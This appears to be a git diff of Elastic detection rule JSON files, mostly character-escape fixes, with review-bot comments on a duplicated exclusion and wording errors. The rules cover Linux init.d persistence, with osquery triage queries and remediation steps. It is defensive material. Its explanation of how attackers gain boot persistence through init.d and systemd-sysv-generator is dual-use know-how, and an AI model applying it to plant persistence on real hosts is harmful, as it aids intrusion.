- "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0.
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0.
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). 
If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n",
 "references": [
 "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json
index 72e7669ab0f..530d48a40ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
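Review bot: The `query` context line on the new side lists `"rpm"` twice in the `process.name` exclusion (`... or "rpm" or "dnf" ... or "rpm" or "vmis-launcher" ...`); the duplicate is harmless but reads like a leftover from an edit, and the list could be reduced to `("dpkg" or "dockerd" or "rpm" or "dnf" or "chef-client" or "apk" or "yum" or "vmis-launcher" or "exe")`. Since this is a numbered snapshot (`_7.json`), the correction presumably belongs in the rule source that produces it rather than in this file. The guide states that the rule looks for "the creation of new files", while the query also matches `rename` and `file_rename_event` actions; a sentence such as `This rule looks for the creation or renaming of files within the /etc/init.d/ directory.` would keep the note aligned with the query. The exclusions key on `process.name` alone, so the triage steps could remind analysts to confirm `process.executable` of a process carrying an excluded package-manager name before closing an alert as benign.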
diff --git a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json
index 66de1d41376..dc73573878b 100644
--- a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json
index 2052ae61bc5..80324d6070d 100644
--- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2",
- "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
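Review bot: The new `setup` string keeps two wording errors from the old side: `is required be configured` (missing `to`) and `with with Advanced Audit Configuration` (doubled `with`), the second one appearing in both policy sections of the string. The same text is carried in the `@@ -59,7` hunks of the `_106`, `_107`, `_108` and `_109` snapshots of this rule further down. If these files are generated from the rule source, the correction belongs there; the rendered text would then read `is required to be configured (Success)` and `Steps to implement the logging policy with Advanced Audit Configuration:`.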
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json
index 4b336c35b08..890dd9538e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2",
- "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json
index 044747a14b6..57d41980f88 100644
--- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2",
- "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json
index 40f2039d5d9..f5ac14db371 100644
--- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2",
- "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json
index 322645b1d39..c1410309262 100644
--- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2",
- "setup": "\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```\n",
+ "setup": "\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json
index 2bf2b292b3f..0dda72ab3ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json
index 40fdee02703..9caacf075b6 100644
--- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json
index a091deb60a3..9aa8e5d7614 100644
--- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json
index b3571d66789..cba2eae48a7 100644
--- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json
index 6a1ffb96318..be1be2b979a 100644
--- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
